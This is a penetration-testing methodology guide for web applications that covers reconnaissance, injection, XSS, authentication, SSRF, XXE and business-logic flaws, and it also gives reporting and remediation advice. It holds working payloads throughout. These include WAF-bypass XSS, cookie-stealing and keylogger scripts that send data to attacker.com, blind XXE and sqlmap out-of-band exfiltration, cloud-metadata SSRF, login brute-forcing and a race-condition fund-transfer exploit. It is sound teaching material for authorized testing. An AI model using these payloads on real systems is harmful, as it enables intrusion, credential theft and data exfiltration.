Advanced Web Application Penetration Testing Methodology

The Evolution of Web Application Security

Web application security has undergone a dramatic transformation over the past decade. Early web attacks focused on simple SQL injection and cross-site scripting against monolithic applications. Today’s attack surface is vastly more complex — single-page applications, microservices architectures, API-first designs, WebSocket communications, and serverless functions all introduce unique vulnerability classes.

Modern pentesters must contend with sophisticated defenses like Web Application Firewalls (WAFs), Content Security Policies (CSP), and runtime application self-protection (RASP). But where defenses have grown, so have the techniques to bypass them. The cat-and-mouse game between attackers and defenders drives continuous innovation on both sides.

This guide walks through a professional-grade web application penetration testing methodology, from initial reconnaissance through exploitation and reporting.

Phase 1: Reconnaissance

Reconnaissance is the foundation of any successful pentest. The more you know about the target, the more precisely you can identify attack vectors.

Passive Reconnaissance (OSINT)

Passive recon gathers information without directly interacting with the target infrastructure:

# Subdomain enumeration using subfinder
subfinder -d target.com -all -silent | sort -u > subdomains.txt

# Historical URL discovery with Wayback Machine
echo "target.com" | waybackurls | grep -E '\.(php|asp|aspx|jsp|json|xml)' | sort -u > wayback_urls.txt

# Google dorking for sensitive files
# site:target.com filetype:pdf | filetype:doc | filetype:xlsx
# site:target.com inurl:admin | inurl:login | inurl:dashboard
# site:target.com ext:env | ext:log | ext:bak | ext:sql

# Certificate transparency log search
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

# GitHub secret scanning
trufflehog github --org=target-org --only-verified

Active Reconnaissance

Active recon involves direct interaction with the target to map the application surface:

# Technology fingerprinting
whatweb https://target.com -v

# Full port scan with service detection
nmap -sV -sC -p- --min-rate 5000 -oA full_scan target.com

# Directory and file brute-forcing
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt \
  -mc 200,301,302,403 -fc 404 -t 50 -o results.json -of json

# Virtual host discovery
ffuf -u https://target.com -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs 0 -mc 200

Phase 2: OWASP Top 10 Deep Dive

A03:2021 — Injection (SQL Injection)

SQL injection remains one of the most devastating vulnerability classes. Modern techniques go far beyond simple ' OR 1=1 -- payloads.

Error-based SQLi detection:

# Classic detection payloads
' OR '1'='1
' UNION SELECT NULL--
' AND 1=CONVERT(int, @@version)--

# Time-based blind SQLi
' AND IF(1=1, SLEEP(5), 0)--
' WAITFOR DELAY '0:0:5'--

Advanced exploitation with sqlmap:

# Automated SQLi exploitation
sqlmap -u "https://target.com/search?q=test" \
  --dbs \
  --level=5 \
  --risk=3 \
  --tamper=space2comment,between,randomcase \
  --random-agent \
  --batch

# Out-of-band data exfiltration
sqlmap -u "https://target.com/api/users?id=1" \
  --dns-domain=attacker-dns.com \
  --technique=T \
  --threads=1

Second-order SQL injection example:

# A stored payload that triggers when an admin views user profiles
# Registration form input for "username" field:
payload = "admin'-- "

# The injection isn't triggered during registration
# It fires when the app executes:
# SELECT * FROM users WHERE username = 'admin'-- '
# This effectively bypasses authentication on the admin panel

A07:2021 — Cross-Site Scripting (XSS)

XSS attacks have evolved significantly. Modern browsers and frameworks provide built-in protections, but bypass techniques are plentiful.

WAF Bypass Techniques:

<!-- Standard payload (usually blocked) -->
<script>alert('XSS')</script>

<!-- Case variation bypass -->
<ScRiPt>alert(document.domain)</ScRiPt>

<!-- Event handler bypass -->
<img src=x onerror="alert(1)">
<svg onload="alert(1)">
<body onpageshow="alert(1)">

<!-- Encoding bypass -->
<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;(1)">

<!-- Template literal bypass (modern JS frameworks) -->
{{constructor.constructor('return alert(1)')()}}

<!-- DOM-based XSS via URL fragment -->
<a href="javascript:void(0)" id="test">Click</a>
<!-- If the app reads location.hash unsafely: -->
<!-- https://target.com/page#<img src=x onerror=alert(1)> -->

<!-- CSP bypass via JSONP endpoint -->
<script src="https://allowed-cdn.com/jsonp?callback=alert(1)//"></script>

Stealing cookies with XSS:

// Exfiltrating session tokens
fetch('https://attacker.com/steal?cookie=' + document.cookie);

// Keylogger injection
document.addEventListener('keypress', function(e) {
  fetch('https://attacker.com/log?key=' + e.key);
});

A07:2021 — Broken Authentication

Authentication flaws remain extremely common and high-impact:

# Brute-force login with ffuf
ffuf -u https://target.com/login \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=FUZZ" \
  -w /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt \
  -fc 401 \
  -t 10

# JWT token manipulation
# Decode the JWT
echo "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInJvbGUiOiJ1c2VyIn0.xxx" | \
  cut -d'.' -f2 | base64 -d 2>/dev/null

# Algorithm confusion attack: change alg from RS256 to HS256
# Sign with the public key as HMAC secret
python3 jwt_tool.py <token> -X k -pk public.pem

Phase 3: Advanced Exploitation Techniques

Server-Side Request Forgery (SSRF)

SSRF allows an attacker to make the server initiate requests to internal resources:

# Basic SSRF to access cloud metadata
curl "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# SSRF with URL scheme bypass
# file:///etc/passwd
# gopher://internal-redis:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
# dict://internal-server:11211/stats

# Bypass common SSRF filters
http://127.0.0.1 → http://0x7f000001
http://localhost → http://[::1]
http://internal.target.com → http://internal.target.com@attacker.com

XML External Entity (XXE) Injection

XXE exploits XML parsers that process external entity references:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

<!-- Blind XXE with out-of-band data exfiltration -->
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Business Logic Vulnerabilities

These are often the most impactful and hardest to find because scanners cannot detect them:

Price manipulation: Modify the price parameter in a purchase request from $100.00 to $0.01
Race conditions: Send concurrent requests to transfer funds, potentially doubling the amount
Workflow bypass: Skip mandatory steps like email verification by directly accessing post-verification endpoints
IDOR via predictable IDs: Access other users’ data by incrementing sequential resource identifiers

# Race condition exploit using concurrent requests
import asyncio
import aiohttp

async def transfer_funds(session, amount):
    async with session.post(
        'https://target.com/api/transfer',
        json={'to': 'attacker_account', 'amount': amount},
        headers={'Authorization': 'Bearer <token>'}
    ) as response:
        return await response.json()

async def exploit():
    async with aiohttp.ClientSession() as session:
        tasks = [transfer_funds(session, 1000) for _ in range(50)]
        results = await asyncio.gather(*tasks)
        print(f"Successful transfers: {sum(1 for r in results if r.get('status') == 'success')}")

asyncio.run(exploit())

Phase 4: Tools of the Trade

Burp Suite Professional Workflow

Burp Suite is the industry standard for web application testing. A typical workflow involves:

Proxy: Intercept and modify requests in real time
Scanner: Automated vulnerability scanning with manual verification
Intruder: Automated payload delivery for fuzzing and brute-forcing
Repeater: Manual request manipulation and response analysis
Collaborator: Out-of-band interaction detection for blind vulnerabilities

Automated Scanning with Nuclei

# Run nuclei with community templates
nuclei -u https://target.com -t cves/ -t vulnerabilities/ -t exposures/ \
  -severity critical,high -o nuclei_results.txt

# Custom template for specific vulnerability
# custom-check.yaml
id: custom-admin-panel
info:
  name: Admin Panel Detection
  severity: info
requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin"
      - "{{BaseURL}}/administrator"
      - "{{BaseURL}}/wp-admin"
    matchers:
      - type: status
        status:
          - 200
          - 302

Phase 5: Professional Reporting

A pentest is only as valuable as the report it produces. Each finding should include:

CVSS v3.1 Scoring Example

Finding: Stored XSS in User Profile Bio
CVSS Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS Score: 6.1 (Medium)

Attack Vector (AV): Network — exploitable over the internet
Attack Complexity (AC): Low — no special conditions required
Privileges Required (PR): Low — attacker needs a valid account
User Interaction (UI): Required — victim must view the profile
Scope (S): Changed — impacts the victim's browser session

Remediation Guidance

Every finding should include actionable remediation steps:

# VULNERABLE: Direct string concatenation in SQL query
query = f"SELECT * FROM users WHERE username = '{user_input}'"

# SECURE: Parameterized query
cursor.execute("SELECT * FROM users WHERE username = %s", (user_input,))

# SECURE: Using an ORM (SQLAlchemy)
user = session.query(User).filter(User.username == user_input).first()

# VULNERABLE: Rendering unsanitized user input
return f"<div>Welcome, {username}</div>"

# SECURE: Using template engine with auto-escaping (Jinja2)
return render_template("welcome.html", username=username)
# In the template: <div>Welcome, {{ username }}</div>
# Jinja2 auto-escapes by default

Conclusion

Web application penetration testing is both an art and a science. Automated tools can identify low-hanging fruit, but the most critical vulnerabilities — business logic flaws, chained exploits, and novel attack vectors — require human creativity and deep technical understanding. Follow a structured methodology, document everything meticulously, and always test with proper authorization. The goal is not just to find vulnerabilities, but to help organizations build more resilient applications.